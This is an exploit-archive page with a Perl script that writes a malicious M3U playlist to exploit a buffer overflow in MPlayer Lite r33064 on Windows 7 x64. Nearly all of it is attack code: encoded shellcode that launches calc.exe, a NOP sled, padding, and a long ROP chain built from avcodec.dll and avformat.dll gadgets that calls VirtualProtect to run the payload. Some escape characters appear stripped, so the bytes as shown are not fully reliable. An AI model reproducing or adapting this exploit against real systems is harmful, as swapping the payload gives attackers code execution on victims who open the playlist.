Home / exploitsPDF  

MPlayer r33064 Lite Buffer Overflow

Posted on 06 April 2011

#!/usr/bin/perl
#
# Exploit Title: Mplayer BOF + ROP Exploit
# Date: 0452011
# Author: Nate_M (based on original WinXP [non ROP] exploit by C4SS!0 and h1ch4m)
# Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayer_Release/Revision%2033064/mplayer_lite_r33064.7z/download
# Version: Lite 33064
# Tested On: Win 7 x64 (doesn't work on 32 bit without heavy modification of offsets)
# CVE : None

use strict;
use warnings;
use IO::File;

print q
{
BOF/ROP exploit created by Nate_M
Now writing M3U file...

};

# windows/exec          CMD=calc.exe
# x86/shikata_ga_nai    size 227
# badchars = 'x00x0dx0ax26x2fx5cx3ex3f'
my $shellcode =
"xe8xffxffxffxffxc8x5ax2bxc9xb1x33" .
"xb8xc4xc4xb8xb3x66x81xecx10x10" .
"x31x42x17x83xc2x04x03x86xd7x5ax46xfa" .
"x30x13xa9x02xc1x44x23xe7xf0x56x57x6cxa0x66" .
"x13x20x49x0cx71xd0xdax60x5exd7x6bxcexb8xd6" .
"x6cxfex04xb4xafx60xf9xc6xe3x42xc0x09xf6x83" .
"x05x77xf9xd6xdexfcxa8xc6x6bx40x71xe6xbbxcf" .
"xc9x90xbex0fxbdx2axc0x5fx6ex20x8ax47x04x6e" .
"x2bx76xc9x6cx17x31x66x46xe3xc0xaex96x0cxf3" .
"x8ex75x33x3cx03x87x73xfaxfcxf2x8fxf9x81x04" .
"x54x80x5dx80x49x22x15x32xaaxd3xfaxa5x39xdf" .
"xb7xa2x66xc3x46x66x1dxffxc3x89xf2x76x97xad" .
"xd6xd3x43xcfx4fxb9x22xf0x90x65x9ax54xdax87" .
"xcfxefx81xcdx0ex7dxbcxa8x11x7dxbfx9ax79x4c" .
"x34x75xfdx51x9fx32xf1x1bx82x12x9axc5x56x27" .
"xc7xf5x8cx6bxfex75x25x13x05x65x4cx16x41x21" .
"xbcx6axdaxc4xc2xd9xdbxccxa0xbcx4fx8cx08x5b" .
"xe8x37x55";

my $buf = "x90" x 1000;
$buf .= $shellcode;
$buf .= "x41" x (2368-length($buf));;
$buf .= "0000";                     # VirtualProtect addr
$buf .= "1111";                     # Return addr
$buf .= "2222";                     # lpAddress
$buf .= "3333";                     # dwsize
$buf .= "4444";                     # flNewProtect
$buf .= "x60x63x12x6B";         # lpflOldProtect
$buf .= "x41" x 76;
##### Begin ROP Chain, create anchor in memory #####
$buf .= pack('V',0x649ABC7B);       # PUSH ESP # POP EBX # POP ESI # RET    [avformat.dll]
$buf .= "x41" x 4;
$buf .= pack('V',0x6B0402A9);       # MOV EAX,EBX # POP EBX # RET           [avcodec.dll]
$buf .= "x41" x 4;
$buf .= pack('V',0x649509B4);       # XCHG EAX,EBP # RET                    [avformat.dll]
$buf .= pack('V',0x6AD9AC5C);       # XOR EAX,EAX # RET     0               [avcodec.dll]
$buf .= pack('V',0x6AD5C728);       # ADD EAX,69 # RET      69              [avcodec.dll]
$buf .= pack('V',0x6AD79CAC);       # DEC EAX # RET         68              [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x649509B4);       # XCHG EAX,EBP # RET                    [avformat.dll]
$buf .= pack('V',0x6AD5130E);       # SUB EAX,EDX # RET                     [avcodec.dll]
$buf .= pack('V',0x6AF1DCB5);       # XCHG EAX,ECX # RET                    [avcodec.dll]
$buf .= pack('V',0x6AFA5EE9);       # MOV EAX,ECX # RET                     [avcodec.dll]
$buf .= pack('V',0x649509B4);       # XCHG EAX,EBP # RET                    [avformat.dll]

##### Find location of VirtualProtect() in kernel32.dll #####
$buf .= pack('V',0x6AD9AC5C);       # XOR EAX,EAX # RET     0               [avcodec.dll]
$buf .= pack('V',0x6AD5C728);       # ADD EAX,69 # RET      69              [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 2;   # INC EAX # RET         6B              [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     D6              [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD);       # INC EAX # RET         D7              [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     1AE             [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     35C             [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD);       # INC EAX # RET         35D             [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     6BA             [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     D74             [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     1AE8            [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     35D0            [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6AF1DCB5);       # XCHG EAX,ECX # RET                    [avcodec.dll]
$buf .= pack('V',0x6AD5130E);       # SUB EAX,EDX # RET                     [avcodec.dll]
$buf .= pack('V',0x6AE8F378);       # MOV EAX,DWORD PTR DS:[EAX] # RET      [avcodec.dll]
$buf .= pack('V',0x6AFCD525);       # XCHG EAX,ESI # RET                    [avcodec.dll]
$buf .= pack('V',0x6AD9AC5C);       # XOR EAX,EAX # RET     0               [avcodec.dll]
$buf .= pack('V',0x6AD5C728);       # ADD EAX,69 # RET      69              [avcodec.dll]
$buf .= pack('V',0x6AD79CAC) x 12;  # DEC EAX # RET         5D              [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     BA              [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     174             [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     2E8             [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     5D0             [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     BA0             [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     1740            [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD);       # INC EAX # RET         1741            [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     2E82            [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6AFCD525);       # XCHG EAX,ESI # RET                    [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET                     [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x649509B4);       # XCHG EAX,EBP # RET                    [avformat.dll]
$buf .= pack('V',0x6AE62D12);       # MOV DWORD PTR DS:[EAX],EDX # RET      [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4;   # INC EAX # RET                         [avcodec.dll]

##### Find location of shellcode #####
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x649509B4);       # XCHG EAX,EBP # RET                    [avformat.dll]
$buf .= pack('V',0x6B0B79D2);       # MOV EAX,EDX # RET                     [avcodec.dll]
$buf .= pack('V',0x6AFCD525);       # XCHG EAX,ESI # RET                    [avcodec.dll]
$buf .= pack('V',0x6AD9AC5C);       # XOR EAX,EAX # RET     0               [avcodec.dll]
$buf .= pack('V',0x6AD5C728);       # ADD EAX,69 # RET      69              [avcodec.dll]
$buf .= pack('V',0x6AD79CAC) x 31;  # DEC EAX # RET         4A              [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     94              [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     128             [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     250             [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     4A0             [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     940             [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6AFCD525);       # XCHG EAX,ESI # RET                    [avcodec.dll]
$buf .= pack('V',0x6AD5130E);       # SUB EAX,EDX # RET                     [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x649509B4);       # XCHG EAX,EBP # RET                    [avformat.dll]
$buf .= pack('V',0x6AE62D12);       # MOV DWORD PTR DS:[EAX],EDX # RET      [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4;   # INC EAX # RET                         [avcodec.dll]
$buf .= pack('V',0x6AE62D12);       # MOV DWORD PTR DS:[EAX],EDX # RET      [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4;   # INC EAX # RET                         [avcodec.dll]

##### Find approx length of shellcode #####
$buf .= pack('V',0x6AFCD525);       # XCHG EAX,ESI # RET                    [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6AFCD525);       # XCHG EAX,ESI # RET                    [avcodec.dll]
$buf .= pack('V',0x6AE62D12);       # MOV DWORD PTR DS:[EAX],EDX # RET      [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4;   # INC EAX # RET                         [avcodec.dll]

##### Set shellcode to read/write #####
$buf .= pack('V',0x6AFCD525);       # XCHG EAX,ESI # RET                    [avcodec.dll]
$buf .= pack('V',0x6AD9AC5C);       # XOR EAX,EAX # RET     0               [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4;   # INC EAX # RET         4               [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     8               [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     10              [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     20              [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6B0B4113);       # ADD EAX,EDX # RET     40              [avcodec.dll]
$buf .= pack('V',0x6B0B79D0);       # MOV EDX,EAX # MOV EAX,EDX # RET       [avcodec.dll]
$buf .= pack('V',0x6AFCD525);       # XCHG EAX,ESI # RET                    [avcodec.dll]
$buf .= pack('V',0x6AE62D12);       # MOV DWORD PTR DS:[EAX],EDX # RET      [avcodec.dll]

##### And profit #####
$buf .= pack('V',0x6AD79CAC) x 16;  # DEC EAX # RET                         [avcodec.dll]
$buf .= pack('V',0x6AD44B94);       # XCHG EAX,ESP # RET


$buf .= "x41" x (5172-length($buf));;
$buf .= "xffxffxffxff";
$buf .= pack('V',0x64953AD6);       # ADD ESP,102C # POP EBX # POP ESI # POP EDI # POP EBP # RET
$buf .= "x41" x 2000;


open(my $FILE,">Exploit.m3u") || die "**Error:
$!
";
print $FILE "http:// ".$buf;
close($FILE);
print "	File Created With Sucess

";

 

TOP

Malware :

Exploits :